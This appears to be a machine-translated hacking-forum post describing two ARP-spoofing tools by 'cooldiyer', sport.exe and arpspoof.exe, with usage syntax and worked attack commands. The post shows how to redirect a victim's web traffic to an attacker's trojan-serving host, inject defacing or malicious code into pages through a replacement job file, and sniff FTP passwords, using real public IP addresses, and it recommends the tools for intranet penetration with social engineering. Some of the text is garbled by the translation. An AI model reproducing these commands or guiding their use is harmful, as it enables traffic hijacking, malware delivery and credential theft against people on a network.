ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

Original] ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

[Original] ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

First: sport.exe

Environment Adaptation: Lan + Switch
Sport.exe (VC ++ 6.0 & Winpcap 3.1 & UPX release) 17kb

ARP portspoof ver 1.0 by cooldiyer
Usage:
Sport & lt; Target & gt; & lt; IP1 & gt; & lt; Port & gt; & lt; ip2 & gt; & lt; Port & gt; & lt; adpnum & gt;
Sport/L

Sport/L list NICs

Assume that the IP address of Baidu.com is 220.181.18.114, the IP address to be spoofed is 192.168.0.12, And the nic id is 2.
To forward data to other websites when 192.168.0.12 accesses Baidu, run the following command:

Go to port 81 of port 202.107.5.23 (your network horse is configured) and the nic id is 2

Sport 192.168.0.12 220.181.18.114 80 202.107.5.23 81 2

At this time, when 192.168.0.12 accesses Baidu, the returned data is the information returned on port 81 of port 202.107.5.23.

You can also switch to another host on the LAN, such

Sport 192.168.0.12 220.181.18.114 80 192.168.0.1008080 2

You can also switch to yourself. Assume that your IP address is 192.168.0.18, a Web server is mounted, and the port is 81.

Sport 192.168.0.12 220.181.18.114 80 192.168.0.18 81 2

When you access Baidu at 192.168.0.12, the page on your Web Service is displayed.

BecauseProgramTarget, that is, the host must have a CIDR Block with you.
There is also the inability to spoof the gateway (because the danger is too high, the program skipped this sectionCode)

These functions can be used for Intranet penetration, coupled with social engineering, can do a lot of unexpected things
__________________________

Second: arpspoof.exe

Environment Adaptation: Lan + Switch
Sport.exe (VC ++ 6.0 & Winpcap 3.1 & UPX release) 19.5kb

Arpspoof ver 3.1 By cooldiyer
Usage:
Arpspoof & lt; IP1 & gt; & lt; ip2 & gt; & lt; Port & gt; & lt; adpnum & gt; & lt; Mode & gt; & lt; jobfile & gt;
Arpspoof/L
Mode options:
0 IP1 -- & gt; ip2
1 IP1 & lt;-& gt; ip2
Examples:
& Gt; arpspoof 192.168.0.1 192.168.0.8 80 2 1 job.txt
# Spoof 192.168.0.1 & lt;-& gt; 192.168.0.8

& Gt; arpspoof 192.168.0.1 192.168.0.8 80 2 0/Reset
# Reset 192.168.0.1 -- & gt; 192.168.0.8

& Gt; arpspoof/L
# Lists adapters

& Gt; arpspoof/n
# Release a new replace job file

The function implemented by the program is to modify data packets while spoofing by arpspoof and add malicious code (available on the public network)

Arpspoof/L list Nic IDS

Note that the content format in jobfile is as follows (you can use arpspoof/N to create a Task file)

----
& Lt; hea
----
Hack by cooldiyer & lt; noframes & gt;
----
& Lt; hea
----
Hack by cooldiyer & lt; noframes & gt;

What do you mean by changing "& lt; hea" to "hack by cooldiyer & lt; noframes & gt, the webpage only displays
"Hack by cooldiyer", because the & lt; noframes & gt; tag shields all the labels behind it. This is a good trick.
The program regards it "----" as a separator. Starting from the first separator, the first is the old string to be replaced, and the second is the new string to be replaced. line breaks are not allowed.
Next, the third separator is the old string to be replaced, and the fourth separator is the new string to be replaced. classes can be added infinitely, but the fewer the separators, the better,
Because the program is too much to eat

The following describes attack instances.

1: Internet attack instance

For example, if the Baidu host is 220.181.18.114, you have the highest permission for a random host, for example, 220.181.18.9, And the gateway is 220.181.18.1.
You can check whether the network card ID is. You can change the number of data destined for the Network to. job.txt is generated using arpspoof/n. The command is as follows:
Arpspoof 220.181.18.1 220.181.18.114 80 2 0 job.txt
In this way, when others access Baidu, they will only see one line of "hack by cooldiyer". Of course, you can also change other data for other purposes.

2: Intranet attack instance
Similarly, when you want 192.168.0.100 to access Baidu, you can see a page hacked. The Gateway is 192.168.0.1. By default, execute the following command:
Arpspoof 192.168.0.1 192.168.0.100 80 2 0 job.txt
When it visits Baidu, it will see the hacked page. Of course, you can also rewrite it into other code.

3: data sniffing. Haha, basic functions. If the parameter is not followed by the task file, the program will display the data on the specified port, for example, sniffing the FTP password.

Arpspoof 202.103.248.1 202.103.248.100 21 2 1

The program will automatically display the data of port 21 that has been sniffed.